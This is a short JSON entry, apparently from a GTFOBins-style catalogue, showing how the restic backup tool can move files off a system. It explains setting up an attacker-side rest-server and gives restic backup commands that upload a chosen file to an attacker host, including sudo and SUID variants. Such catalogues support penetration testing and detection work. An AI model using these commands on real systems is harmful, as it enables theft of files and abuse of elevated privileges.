{ "description": "The attacker must setup a server to receive the backups, in the following example https://github.com/restic/rest-server/ is used but there are other options. To start a new instance and create a new repository:\n\n./rest-server --listen \":[port]\"\nrestic init -r \"rest:http://localhost:[port]/[file]\"\n\nTo extract the data from the restic repository in the current directory on the attacker side:\n\nrestic restore -r \"/tmp/restic/[file]\" latest --target .\n\nUpload data to the attacker server with the following commands.\n", "functions": { "file-upload": [ { "code": "restic backup -r \"rest:http://[host]:[port]/[backup]\" \"[file]\"\n" } ], "sudo": [ { "code": "sudo restic backup -r \"rest:http://[host]:[port]/[backup]\" \"[file]\"\n" } ], "suid": [ { "code": "./restic backup -r \"rest:http://[host]:[port]/[backup]\" \"[file]\"\n" } ] } }